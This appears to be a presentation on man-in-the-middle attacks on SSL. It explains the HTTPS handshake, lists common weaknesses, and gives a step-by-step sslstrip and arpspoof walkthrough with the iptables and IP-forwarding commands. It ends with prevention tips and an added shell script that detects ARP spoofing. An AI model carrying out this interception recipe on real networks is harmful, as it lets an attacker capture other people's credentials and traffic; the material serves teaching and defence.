Man-in-the-Middle Attack on SSL
HTTP vs HTTPS?
Instead of HyperText Transfer Protocol (HTTP), this website uses HyperText Transfer Protocol Secure (HTTPS). Using HTTPS, the computers agree on a "code" between them, and then they scramble the messages using that "code" so that no one in between can read them. This keeps your information safe from hackers.
How SSL Works
A browser or server attempts to connect to a website (i.e. a web server) secured with SSL.
The browser/server requests that the web server identify itself.
The web server sends the browser/server a copy of its SSL certificate.
The browser/server checks to see whether or not it trusts the SSL certificate. If so, it sends a message to the web server.
The web server sends back a digitally signed acknowledgement to start an SSL encrypted session.
Encrypted data is shared between the browser/server and the web server.
Common SSL Misconceptions
HTTPS means I am secure, right?
- SSL version 2.0 flaws
- Weak ciphers < 128 bit
- Certificate keys < 1024 bits
SSL can provide a false sense of security
Common HTTP/HTTPS Connection
Using SSL Strip
1. Get sslstrip
A. Download and install sslstrip and arpspoof (Linux only)
B. Get Kali Linux
2. Configure attack machine for IP forwarding.
echo "1" > /proc/sys/net/ipv4/ip_forward
3. Route all HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 54321
4. Run sslstrip.
sslstrip -l 54321
5. Configure ARP spoofing.
arpspoof -i eth0 -t <targetIP> <gatewayIP>
6. Launch a sniffer and collect data.
Expanding the attack
What if a root certificate could be installed on the target?
The attacker could potentially replace the site's certificate with one of their own and still maintain what appears to the target to be a secure connection.
Preventing SSL Spoofing
Ensure you are using secure connections. Look for the HTTPS.
Be careful about where you use secure sites.
Secure machines on the network.
Use static ARP tables.*
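
A defender-side check related to the ARP spoofing step and the static ARP advice above, as an added example that is not part of the original slides: it reads a Linux ARP cache in /proc/net/arp format, reports any MAC address that answers for more than one IP, and compares the gateway entry against a pinned MAC. The function names, addresses and sample table are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): heuristics for spotting ARP
# spoofing in a Linux ARP cache. Input is text in /proc/net/arp format.

# find_shared_macs: print "MAC IP1,IP2,..." for each MAC that answers for
# more than one IP. A spoofing host often shows up this way, but proxy ARP
# and multi-homed hosts do too, so treat a hit as a lead, not proof.
find_shared_macs() {
    awk 'NR > 1 && $4 != "00:00:00:00:00:00" {   # skip header, incomplete entries
             mac = tolower($4)
             if (mac in ips) ips[mac] = ips[mac] "," $1; else ips[mac] = $1
             count[mac]++
         }
         END { for (m in count) if (count[m] > 1) print m, ips[m] }' | sort
}

# gateway_mac_changed GATEWAY_IP PINNED_MAC: exit status 0 (alert) when the
# cache maps the gateway to a MAC other than the pinned one, 1 otherwise.
# The pinned MAC is the value you would put in a static ARP entry.
gateway_mac_changed() {
    awk -v gw="$1" -v want="$2" '
        NR > 1 && $1 == gw { seen = 1; if (tolower($4) != tolower(want)) bad = 1 }
        END { exit !(seen && bad) }'
}

# Constructed sample cache: the gateway (192.168.1.1) and host 192.168.1.50
# resolve to the same MAC, which is what a poisoned cache looks like.
SAMPLE_ARP='IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         02:00:00:00:00:50     *        eth0
192.168.1.50     0x1         0x2         02:00:00:00:00:50     *        eth0
192.168.1.77     0x1         0x2         02:00:00:00:00:77     *        eth0'

# Demo on the constructed sample.
printf '%s\n' "$SAMPLE_ARP" | find_shared_macs
if printf '%s\n' "$SAMPLE_ARP" | gateway_mac_changed 192.168.1.1 02:00:00:00:00:01; then
    echo "ALERT: gateway MAC differs from pinned value"
fi
```

On a live Linux host, feed the functions the real cache instead of the sample, for example find_shared_macs < /proc/net/arp.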